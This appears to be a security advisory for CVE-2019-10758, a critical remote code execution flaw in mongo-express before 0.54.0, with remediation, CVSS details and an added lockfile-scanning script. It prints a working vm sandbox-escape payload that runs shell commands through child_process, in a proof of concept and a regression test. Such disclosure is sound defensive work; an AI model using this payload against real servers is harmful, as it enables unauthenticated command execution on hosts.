Remote Code Execution (RCE)

Affecting mongo-express package, versions <0.54.0

Overview

mongo-express is a web-based MongoDB admin interface written with Node.js, Express and Bootstrap 3.

Affected versions of this package are vulnerable to Remote Code Execution (RCE) via endpoints that use the toBSON method. The root cause is a misuse of the vm dependency: input reaching those endpoints is evaluated in a context that is not a safe sandbox, so it can run exec commands on the host.

PoC by Jonathan Leitschuh

// macOS: the payload escapes the vm context and launches Calculator when evaluated
this.constructor.constructor("return process")().mainModule.require('child_process').execSync('/Applications/Calculator.app/Contents/MacOS/Calculator')

// Regression test for the same escape, using `id` instead of Calculator
it('should not be executable', function () {
  const test = `
  this.constructor.constructor("return console")().log(this.constructor.constructor("return process")().mainModule.require('child_process').execSync('id').toString())
  `;
  const result = bson.toBSON(test);
});

Remediation

Upgrade mongo-express to version 0.54.0 or higher.
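As an added example (not part of this advisory or of the mongo-express project), the script below scans a package-lock.json for any mongo-express entry older than the fixed version 0.54.0, covering both the nested lockfile v1 shape and the flat v2/v3 "packages" shape; the lockfile contents are constructed for the demonstration.

```javascript
// Added example: find mongo-express copies below the fixed version (CVE-2019-10758).
const FIXED_VERSION = '0.54.0';

// Numeric comparison of dotted versions; returns -1, 0 or 1.
// A pre-release suffix ("0.54.0-beta") sorts below the plain release.
function compareVersions(a, b) {
  const parse = (v) => {
    const [core, pre] = v.replace(/^[\^~=v]/, '').split('-');
    return { nums: core.split('.').map((n) => parseInt(n, 10) || 0), pre };
  };
  const pa = parse(a), pb = parse(b);
  for (let i = 0; i < 3; i++) {
    const d = (pa.nums[i] || 0) - (pb.nums[i] || 0);
    if (d !== 0) return d < 0 ? -1 : 1;
  }
  if (pa.pre && !pb.pre) return -1;
  if (!pa.pre && pb.pre) return 1;
  return 0;
}

function isVulnerable(version) {
  return compareVersions(version, FIXED_VERSION) < 0;
}

// Returns [{ path, version }] for every vulnerable mongo-express entry in the lock.
function findVulnerableMongoExpress(lock) {
  const hits = [];
  if (lock.packages) {
    // lockfile v2/v3: flat map keyed by install path
    for (const [path, entry] of Object.entries(lock.packages)) {
      if (path.endsWith('node_modules/mongo-express') && entry.version && isVulnerable(entry.version)) {
        hits.push({ path, version: entry.version });
      }
    }
    return hits;
  }
  // lockfile v1: nested "dependencies" trees
  const walk = (deps, prefix) => {
    for (const [name, entry] of Object.entries(deps || {})) {
      const path = `${prefix}node_modules/${name}`;
      if (name === 'mongo-express' && entry.version && isVulnerable(entry.version)) {
        hits.push({ path, version: entry.version });
      }
      walk(entry.dependencies, `${path}/`);
    }
  };
  walk(lock.dependencies, '');
  return hits;
}

// Constructed sample lock (v1 shape): one vulnerable copy, one already fixed.
const SAMPLE_LOCK = {
  lockfileVersion: 1,
  dependencies: {
    'mongo-express': { version: '0.53.0' },
    'some-tool': { version: '1.0.0', dependencies: { 'mongo-express': { version: '0.54.0' } } },
  },
};
console.log(findVulnerableMongoExpress(SAMPLE_LOCK));
```

For a real project, replace SAMPLE_LOCK with `JSON.parse(require('fs').readFileSync('package-lock.json', 'utf8'))`.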

CVSS Score

10.0
critical severity
  • Attack Vector
    Network
  • Attack Complexity
    Low
  • Privileges Required
    None
  • User Interaction
    None
  • Scope
    Changed
  • Confidentiality
    High
  • Integrity
    High
  • Availability
    High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H/E:P/RL:O/RC:C
Credit: Jonathan Leitschuh
CVE: CVE-2019-10758
CWE: CWE-94
Snyk ID: SNYK-JS-MONGOEXPRESS-473215
Disclosed: 14 Oct, 2019
Published: 16 Oct, 2019